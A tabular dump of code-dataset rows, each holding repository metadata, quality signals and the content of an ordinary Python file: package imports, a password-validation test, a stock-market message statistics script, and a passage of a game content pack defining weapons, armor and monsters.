hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
04edd92c5c5a0510a8898fbb7c3ed86c68328173 | 108 | py | Python | flutile/__init__.py | flu-crew/flutile | 207a13772b2944f1118b608a93a586930000a6f7 | [
"MIT"
] | 3 | 2021-01-16T02:54:23.000Z | 2021-08-31T16:36:20.000Z | flutile/__init__.py | flu-crew/flutile | 207a13772b2944f1118b608a93a586930000a6f7 | [
"MIT"
] | 3 | 2020-12-02T16:35:33.000Z | 2020-12-07T20:13:46.000Z | flutile/__init__.py | flu-crew/flutile | 207a13772b2944f1118b608a93a586930000a6f7 | [
"MIT"
] | null | null | null | from flutile.functions import aadiff_table, represent
from flutile.motifs import get_ha_subtype_nterm_motif
| 36 | 53 | 0.888889 | 16 | 108 | 5.6875 | 0.8125 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 108 | 2 | 54 | 54 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b6bf159c13082ec171d0385ccd7d42e5006e1b78 | 229 | py | Python | tests/pyregex/test_password_validation.py | JASTYN/pythonmaster | 46638ab09d28b65ce5431cd0759fe6df272fb85d | [
"Apache-2.0",
"MIT"
] | 3 | 2017-05-02T10:28:13.000Z | 2019-02-06T09:10:11.000Z | tests/pyregex/test_password_validation.py | JASTYN/pythonmaster | 46638ab09d28b65ce5431cd0759fe6df272fb85d | [
"Apache-2.0",
"MIT"
] | 2 | 2017-06-21T20:39:14.000Z | 2020-02-25T10:28:57.000Z | tests/pyregex/test_password_validation.py | JASTYN/pythonmaster | 46638ab09d28b65ce5431cd0759fe6df272fb85d | [
"Apache-2.0",
"MIT"
] | 2 | 2016-07-29T04:35:22.000Z | 2017-01-18T17:05:36.000Z | import unittest
from pyregex.password_validation import password_validation
class PassTests(unittest.TestCase):
def test_1(self):
self.assertEqual("ABd1234@1", password_validation("ABd1234@1,a F1#,2w3E*,2We3345"))
| 25.444444 | 91 | 0.768559 | 29 | 229 | 5.931034 | 0.655172 | 0.313953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094527 | 0.122271 | 229 | 8 | 92 | 28.625 | 0.761194 | 0 | 0 | 0 | 0 | 0 | 0.165939 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0.6 | 0.4 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
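The test row above asserts only that `password_validation("ABd1234@1,a F1#,2w3E*,2We3345")` returns `"ABd1234@1"`; the implementation in `pyregex.password_validation` is not included in the dump. A minimal sketch consistent with that single assertion follows — the exact policy (minimum length 6, no whitespace, and at least one lowercase letter, one uppercase letter, one digit, and one special character) is an inference from the test data, not the pyregex source:

```python
import re

# Assumed policy, inferred from the test case above (not from pyregex):
#   - at least 6 non-whitespace characters
#   - at least one lowercase letter, one uppercase letter, one digit,
#     and one non-alphanumeric special character
_POLICY = re.compile(
    r'^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^A-Za-z0-9\s])\S{6,}$'
)

def password_validation(candidates):
    """Return the comma-separated candidates that satisfy the policy."""
    return ",".join(p for p in candidates.split(",") if _POLICY.match(p))
```

Under these rules, `"a F1#"` fails on whitespace, `"2w3E*"` on length, and `"2We3345"` on the missing special character, leaving only `"ABd1234@1"`.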
b6cebc3bf604b2dca7b8061e0a152fc1d49ba1d7 | 35 | py | Python | archived_projects_(dead)/declare_pyside/qmlside/hot_loader/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | 3 | 2021-11-02T03:45:27.000Z | 2022-03-27T05:33:36.000Z | declare_pyside/qmlside/hot_loader/__init__.py | Likianta/pyml | b0005b36aa94958a7d3e306a9df65fea46669d18 | [
"MIT"
] | null | null | null | declare_pyside/qmlside/hot_loader/__init__.py | Likianta/pyml | b0005b36aa94958a7d3e306a9df65fea46669d18 | [
"MIT"
] | null | null | null | from .hot_loader import hot_loader
| 17.5 | 34 | 0.857143 | 6 | 35 | 4.666667 | 0.666667 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b6fb41548c7f10ee3286a733e88db94492d59541 | 6,216 | py | Python | examples/statistics.py | alexanu/prickle | e76f4c9d7afaa65a6d0470f649fbf9edbc2bc500 | [
"MIT"
] | 27 | 2018-05-16T09:28:56.000Z | 2022-02-28T02:00:33.000Z | examples/statistics.py | alexanu/prickle | e76f4c9d7afaa65a6d0470f649fbf9edbc2bc500 | [
"MIT"
] | 5 | 2018-06-06T19:38:07.000Z | 2019-10-23T16:10:31.000Z | examples/statistics.py | alexanu/prickle | e76f4c9d7afaa65a6d0470f649fbf9edbc2bc500 | [
"MIT"
] | 16 | 2018-06-07T15:51:22.000Z | 2021-11-23T10:53:57.000Z | from prickle import nodups, find_trades
import pandas as pd
import numpy as np
import os
import time
root = '/Volumes/datasets/ITCH/'
dates = [date for date in os.listdir('{}/csv/'.format(root)) if date != '.DS_Store']
names = [name.lstrip(' ') for name in pd.read_csv('{}/SP500.txt'.format(root))['Symbol']]
# message_counts.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
counts = pd.value_counts(messages['type']).sort_index()
row = [date, name] + list(counts)
output.append(row)
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'A', 'C', 'D', 'E', 'F', 'U', 'X'])
df.to_csv('/Volumes/datasets/ITCH/stats/message_counts.txt')
# message_shares.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
for label in ['A', 'C', 'D', 'E', 'F', 'U', 'X']:
shares = np.abs(messages[messages['type'] == label]['shares'])
cnts, bins = np.histogram(shares, np.arange(0, 2025, 25))
output.append([date, name, label] + list(cnts))
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'type'] + list(np.arange(0, 2000, 25)))
df.to_csv('/Volumes/datasets/ITCH/stats/message_shares.txt')
# message_times.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
for label in ['A', 'C', 'D', 'E', 'F', 'U', 'X']:
times = messages[messages['type'] == label]['time']
cnts, bins = np.histogram(times, np.arange(34200, 57900, 300))
output.append([date, name, label] + list(cnts))
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'type'] + list(np.arange(34200, 57600, 300)))
df.to_csv('/Volumes/datasets/ITCH/stats/message_times.txt')
# message_nano.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
for label in ['A', 'C', 'D', 'E', 'F', 'U', 'X']:
nanos = messages[messages['type'] == label]['nano']
cnts, bins = np.histogram(nanos, bins=np.arange(0, 10 ** 9 + 2 * 10 ** 7, 2 * 10 ** 7))
output.append([date, name, label] + list(cnts))
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'type'] + list(np.arange(0, 10 ** 9, 2 * 10 ** 7)))
df.to_csv('/Volumes/datasets/ITCH/stats/message_nano.txt')
# trades.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
trades = find_trades(messages)
trades['date'] = date
trades['name'] = name
output.append(trades)
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.concat(output)
df.to_csv('/Volumes/datasets/ITCH/stats/trades.txt')
# hidden.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
hidden = pd.read_csv('{}/csv/{}/trades/trades_{}.txt'.format(root, date, name))
hidden['time'] = hidden['sec'] + hidden['nano'] / 10 ** 9
hidden = hidden[(hidden['time'] > 34200) & (hidden['time'] < 57000)]
trades = find_trades(hidden)
trades['date'] = date
trades['name'] = name
output.append(trades)
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.concat(output)
df.to_csv('/Volumes/datasets/ITCH/stats/hidden_trades.txt')
| 48.944882 | 102 | 0.578024 | 804 | 6,216 | 4.416667 | 0.113184 | 0.081104 | 0.027879 | 0.033793 | 0.773303 | 0.767389 | 0.767389 | 0.765418 | 0.716136 | 0.716136 | 0 | 0.040587 | 0.211229 | 6,216 | 126 | 103 | 49.333333 | 0.683663 | 0.015122 | 0 | 0.716814 | 0 | 0 | 0.190352 | 0.098937 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.044248 | 0 | 0.044248 | 0.053097 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
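The `examples/statistics.py` row above repeats the same preamble in all five passes: build a float `time` column from `sec` and `nano`, then keep only rows inside regular trading hours (34200 s = 9:30 a.m., 57600 s = 4:00 p.m.). A sketch of how that repeated block could be factored into one helper — the helper name is hypothetical, while the column names and bounds come from the script itself:

```python
import pandas as pd

# Regular trading-hours bounds, in seconds after midnight, matching the
# 34200/57600 literals used throughout the statistics.py script.
TRADING_START = 34200
TRADING_END = 57600

def clip_to_trading_hours(df):
    """Add a float 'time' column (sec plus nano as fractional seconds)
    and keep only rows strictly inside regular trading hours."""
    df = df.copy()
    df['time'] = df['sec'] + df['nano'] / 10 ** 9
    return df[(df['time'] > TRADING_START) & (df['time'] < TRADING_END)]
```

Each block in the script could then call this once on `messages` and once on `books` before `nodups`, instead of restating the four filter lines.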
f3d02e16c902233caa47190ed03f7585687b37aa | 37 | py | Python | charis/parallel/__init__.py | thaynecurrie/charis-dep | 238397bb3ec18edba6e59c7203a623709ff4b50d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | charis/parallel/__init__.py | thaynecurrie/charis-dep | 238397bb3ec18edba6e59c7203a623709ff4b50d | [
"BSD-2-Clause-FreeBSD"
] | 14 | 2018-01-23T14:46:39.000Z | 2021-05-24T17:29:52.000Z | charis/parallel/__init__.py | thaynecurrie/charis-dep | 238397bb3ec18edba6e59c7203a623709ff4b50d | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2017-12-28T10:10:32.000Z | 2021-03-23T20:36:55.000Z | from par_utils import Task, Consumer
| 18.5 | 36 | 0.837838 | 6 | 37 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 37 | 1 | 37 | 37 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f3dd583293ff15a754a6b761f94843fbe31fa40c | 32 | py | Python | Spectroscopy/atomiclines.py | guangtunbenzhu/BGT-Cosmology | 2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee | [
"MIT"
] | 1 | 2018-06-17T14:42:52.000Z | 2018-06-17T14:42:52.000Z | Spectroscopy/atomiclines.py | guangtunbenzhu/BGT-Cosmology | 2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee | [
"MIT"
] | null | null | null | Spectroscopy/atomiclines.py | guangtunbenzhu/BGT-Cosmology | 2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee | [
"MIT"
] | null | null | null | from .lines import AtomicLines
| 10.666667 | 30 | 0.8125 | 4 | 32 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 32 | 2 | 31 | 16 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f3f5cd432178c685d42736e322b3d6e995451dd1 | 42 | py | Python | ImageNetLT/datasets/dataset.py | FPNAS/ResLT | 1610b6b455cecd720c37d1da5208111b25baa257 | [
"MIT"
] | 13 | 2021-01-26T08:17:26.000Z | 2021-07-07T08:26:53.000Z | ImageNetLT/datasets/dataset.py | FPNAS/ResLT | 1610b6b455cecd720c37d1da5208111b25baa257 | [
"MIT"
] | 4 | 2021-01-28T15:21:55.000Z | 2021-07-16T13:56:57.000Z | ImageNetLT/datasets/dataset.py | FPNAS/ResLT | 1610b6b455cecd720c37d1da5208111b25baa257 | [
"MIT"
] | 1 | 2022-01-01T03:17:57.000Z | 2022-01-01T03:17:57.000Z | from datasets.imagenet import ImageNet
| 10.5 | 39 | 0.809524 | 5 | 42 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 42 | 3 | 40 | 14 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6d1d6f4f11009c73cf75639ac5ce66e021c59c8f | 22 | py | Python | Books/GodOfPython/P00_OriginalSource/ch18/mypkg/build/lib/smtpkg7/camera/__init__.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | 2 | 2020-12-05T07:42:55.000Z | 2021-01-06T23:23:18.000Z | Books/GodOfPython/P00_OriginalSource/ch18/mypkg/smtpkg7/camera/__init__.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | Books/GodOfPython/P00_OriginalSource/ch18/mypkg/smtpkg7/camera/__init__.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | from . import camera
| 7.333333 | 20 | 0.727273 | 3 | 22 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 2 | 21 | 11 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6d258bd4e7f61d64c5e98a9987ed17f2fffbfdfb | 10,965 | py | Python | Content/basic_pack.py | Josephkhland/MUFA-MMO | 59a9b5452e7882c82fe8e4a7574cd768c52ea1e9 | [
"MIT"
] | 3 | 2020-05-03T02:09:36.000Z | 2021-11-11T19:24:16.000Z | Content/basic_pack.py | Josephkhland/MUFA-MMO | 59a9b5452e7882c82fe8e4a7574cd768c52ea1e9 | [
"MIT"
] | 1 | 2020-10-24T21:13:50.000Z | 2020-10-26T11:54:25.000Z | Content/basic_pack.py | Josephkhland/MUFA-MMO | 59a9b5452e7882c82fe8e4a7574cd768c52ea1e9 | [
"MIT"
] | null | null | null | import mufa_world as mw
import mufadb as db
def basic_weapons():
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Sword",
item_type = 3,
precision_scale = 90,
damage_amp_scale = 5,
damage_per_amp = 2,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Spear",
item_type = 4,
precision_scale = 70,
damage_amp_scale = 5,
damage_per_amp = 2,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Club",
item_type = 5,
precision_scale = 50,
damage_amp_scale = 50,
damage_per_amp = 5,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Bow",
item_type = 6,
precision_scale = 70,
damage_amp_scale = 50,
damage_per_amp = 2,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Goblin Claws",
item_type = 3,
precision_scale = 90,
damage_amp_scale = 10,
damage_per_amp = 1,
damage_base = 3).save()
print("Basic Weapons Pack Installed Successfully")
def basic_armor():
#Cultist Armor Set
db.ArmorSet(name = "Cultist",
two_items_set_bonus = [1,0,0,0],
full_set_bonus = [2,0,0,0]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Cultist's Hood",
armor_set = db.ArmorSet.objects.get(name = "Cultist").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Cultist's Robes",
armor_set = db.ArmorSet.objects.get(name = "Cultist").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Cultist's Boots",
armor_set = db.ArmorSet.objects.get(name = "Cultist").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
#Rook Armor Set
db.ArmorSet(name = "Rook",
two_items_set_bonus = [0,1,0,0],
full_set_bonus = [0,2,0,0]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Rook's Helmet",
armor_set = db.ArmorSet.objects.get(name = "Rook").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Rook's Hide",
armor_set = db.ArmorSet.objects.get(name = "Rook").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Rook's Boots",
armor_set = db.ArmorSet.objects.get(name = "Rook").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
#Acrobat Armor Set
db.ArmorSet(name = "Acrobat",
two_items_set_bonus = [0,0,1,0],
full_set_bonus = [0,0,2,0]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Acrobat's Cap",
armor_set = db.ArmorSet.objects.get(name = "Acrobat").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Acrobat's Shirt",
armor_set = db.ArmorSet.objects.get(name = "Acrobat").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Acrobat's Shoes",
armor_set = db.ArmorSet.objects.get(name = "Acrobat").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
#Brute Armor Set
db.ArmorSet(name = "Brute",
two_items_set_bonus = [0,0,0,1],
full_set_bonus = [0,0,0,2]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Brute's Helmet",
armor_set = db.ArmorSet.objects.get(name = "Brute").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Brute's Armour",
armor_set = db.ArmorSet.objects.get(name = "Brute").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Brute's Boots",
armor_set = db.ArmorSet.objects.get(name = "Brute").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
print("Basic Armour Pack Installed Successfully")
def basic_monsters():
null_obj = db.Item.objects.get(name = "null_object").to_dbref()
weapon_slash = db.Weapon.objects.get(name = "Goblin Claws").to_dbref()
helmet = db.Armor.objects.get(name = "Rook's Helmet").to_dbref()
chestpiece = db.Armor.objects.get(name = "Rook's Hide").to_dbref()
boots = db.Armor.objects.get(name = "Rook's Boots").to_dbref()
n_char = db.character(name = "Goblin Rook",
willpower = 1,
vitality = 2,
agility = 1,
strength = 1,
karma = 1,
current_health = 10,
current_sanity = 10,
armor_equiped = [helmet,chestpiece,boots],
weapons_equiped = [weapon_slash,null_obj,null_obj,null_obj],
instance_stack = []
)
db.MonsterEntry(name = n_char.name, character_stats=n_char).save()
helmet = db.Armor.objects.get(name = "Acrobat's Cap").to_dbref()
